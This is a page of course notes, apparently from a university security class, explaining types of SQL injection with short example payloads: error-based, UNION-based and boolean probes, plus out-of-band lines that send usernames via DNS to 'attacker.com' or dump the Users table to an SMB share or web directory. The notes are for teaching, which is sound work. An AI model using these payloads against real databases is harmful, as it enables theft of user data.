Notes - MCS
Analysis and Exploration of Vulnerabilities
Notes - MCS
Analysis and Exploration of Vulnerabilities
  • Analysis and Exploration of Vulnerabilities
  • Vulnerabilities
    • Vulnerabilities
      • CIA Triad
      • Vulnerability Sources
    • Vulnerability Tracking
    • Vulnerability Disclosure
  • Vulnerability Assessment of Networked Systems
    • Vulnerability Research
    • Vulnerability Assessment
    • Penetration Test
      • Scope
    • Types of Assessments
    • Vulnerability Management Life Cycle
  • Enumeration and Information Leakage
    • Network access
    • Information leakage
    • Errors
    • Web Sources and Support Files
    • Cookies
    • Ports
    • Banners
    • OS Fingerprinting
  • Injection
    • CWE-74
    • How it works
    • Common Pitfalls
    • CWE-89 SQL Injection
    • Using SQL
    • Things to consider
    • The NULL plate
    • SQLi types
    • SQL Injection - Avoiding
    • CWE-78 OS Command Injection
    • Command Override
    • Argument Exploitation
    • GTFOBins and LOLBAS
    • Environmental Variables
    • Parameter Expansion
    • Code Injection - CWE-94
    • Avoiding OS Injection
  • Broken Authentication
    • OWASP A2
    • HTTP Basics
    • HTTP Communication
    • Authentication
    • Authentication Flow State
    • Referer Header
    • SESSION ID
    • Cookies (RFC 6265)
    • JWT - JSON Web Tokens
  • XSS Cross Site Scripting
    • Prevalence and Detectability
    • Reflected XSS
    • Stored XSS
    • DOM XSS
    • Cross Site Request Forgery
    • Avoiding XSS
    • Same Origin Policy
  • Concurrency
    • Concurrency
    • CWE-361 - 7PK - Time and State
    • Basic Time Related CWEs
      • CWE-362 – Race Condition
    • Serializability
    • Database ACID characteristic
    • State Related CWEs
    • Basic Side Effects Related CWEs (Covert Channel)
    • Covert Timing Channel
    • Meltdown Type
  • Buffers
    • Buffer Overflow
    • Popularity decline
    • Potentially Vulnerable Software
    • Dominant prevalence
    • Vulnerabilities in languages (mostly C/C++)
    • Why? Memory Structure 101
    • CWE-120 Classic Overflow
      • Practical Examples
    • Stack Based Vulnerabilities
    • Stack Smashing
    • Countermeasures
    • ROP
Powered by GitBook
On this page
  • In Band (Classic)
  • In Band - Error Based
  • In Band - Union Based
  • Blind (Inferential)
  • Blind – Content-Based
  • Blind – Time Based
  • DNS
  • SMB Share
  • HTTP Dir
  1. Injection

SQLi types

In Band (Classic)

Payload is provided and the result is determined directly.

  • E.g. user is logged in, data is obtained, and tables are deleted.

In-band means that the result arrives from the same channel used to provide the payload.

As seen previously in the examples.

In Band - Error Based

Relies on the existence of an error returned by the server.

  • Detecting the existence of a SQLi only requires the creation of a syntax error: ‘

Used when the service executes a query but doesn’t provide enough information for directly grabbing the data.

Detection using a single quote: http://site.com/items.php?id=2’

Or extracting data: id=2OR CAST(NULLIF(CURRENT_USER, ‘admin') AS INT)

  • If CURRENT_USER is ‘admin’, NULL is returned and can be CAST to INT.

  • If CURRENT_USER is not ‘admin’, ‘admin’ is returned, and an error is triggered.

In Band - Union Based

Exploits the UNION operator to extract data from other tables.

Why? A query is restricted to a set of tables before the area where a payload may be injected

SELECT Users.name,Address.street from Users,Address where
Users.address_id = Address.id and Users.name = $name

Payload for $name will use the form: UNION(SELECT * from Products)

  • Table Products will be brought into the query.

Blind (Inferential)

Inferential / Blind exploitation occurs when the SQLi still occurs, but its result is not provided to the attacker.

  • Because developers blocked debug information.

  • Because the vulnerability is a simple query.

The existence of an SQLi is determined by a change in the service behavior.

  • Without the existence of an error.

  • Without exploiting forms or logins.

Blind – Content-Based

Detected using payloads with forced Boolean results.

Standard request: http://site.com/items.php?id=2

  • Always true: http://site.com/items.php?id=2 and 1=1

  • Always false: http://site.com/items.php?id=2 and 1=2

If a system is vulnerable requests will yield different results.

  • Always true: will return article 2 because id=2 and True is equivalent to id=2.

  • Always false: will fail because id=2 and False is always false

Blind – Time Based

Results in data being exfiltrated from additional channels.

  • Data, or the query status is registered in a resource available to the attacker.

DNS

SELECT LOAD_FILE(CONCAT('\\', (SELECT username FROM Users), '.attacker.com’));

  • A DNS query will be made to username.attacker.com

SMB Share

SELECT * FROM USERS INTO OUTFILE '\host\share\out.txt’

  • A file named out.txt is written to a server controlled by the attacker.

HTTP Dir

SELECT * FROM USERS INTO OUTFILE '/var/www/out.txt’

  • File out.txt is written to a directory made available through HTTP.

Last updated 1 year ago